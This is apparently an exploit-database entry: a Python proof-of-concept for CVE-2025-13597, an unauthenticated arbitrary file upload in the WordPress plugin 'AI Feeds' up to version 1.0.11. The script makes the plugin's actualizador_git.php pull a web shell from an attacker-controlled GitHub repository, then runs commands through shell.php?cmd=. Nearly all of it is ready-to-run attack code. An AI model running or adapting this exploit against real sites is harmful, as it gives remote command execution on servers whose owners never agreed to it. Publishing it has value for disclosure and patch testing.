README.md
Rendering markdown...
# Exploit Title: AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload
# Date: 11/22/2025
# Exploit Author: Ryan Kozak
# Vendor Homepage: https://ai.cibeles.net/
# Version: <= 1.0.11
# CVE : CVE-2025-13597
import argparse
import requests
def exploit(target, owner, repo, token, command):
print("[*] Exploiting actualizador_git.php vulnerability...")
print(f"[*] Downloading and installing shell from GitHub repository: {owner}/{repo}")
exploit_url = f"{target}/wp-content/plugins/ai-feeds/actualizador_git.php"
params = {
'owner': owner,
'repo': repo,
'ref': 'main',
'token': token
}
response = requests.get(exploit_url, params=params, timeout=30)
print(response.text.strip())
print("\n[*] Exploit executed. Checking if shell.php was created...\n")
print("[*] Testing shell access...")
shell_url = f"{target}/wp-content/plugins/ai-feeds/shell.php"
shell_params = {'cmd': command}
response = requests.get(shell_url, params=shell_params, timeout=10)
print(response.text.strip())
print("\n")
print("[*] Shell should be accessible at:")
print(f" {target}/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND")
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', required=True, help='Target URL')
parser.add_argument('-o', '--owner', required=True, help='GitHub repository owner')
parser.add_argument('-r', '--repo', required=True, help='GitHub repository name')
parser.add_argument('-k', '--token', required=True, help='GitHub Personal Access Token')
parser.add_argument('-c', '--command', default='whoami', help='Command to execute (default: whoami)')
args = parser.parse_args()
exploit(args.target, args.owner, args.repo, args.token, args.command)
if __name__ == '__main__':
main()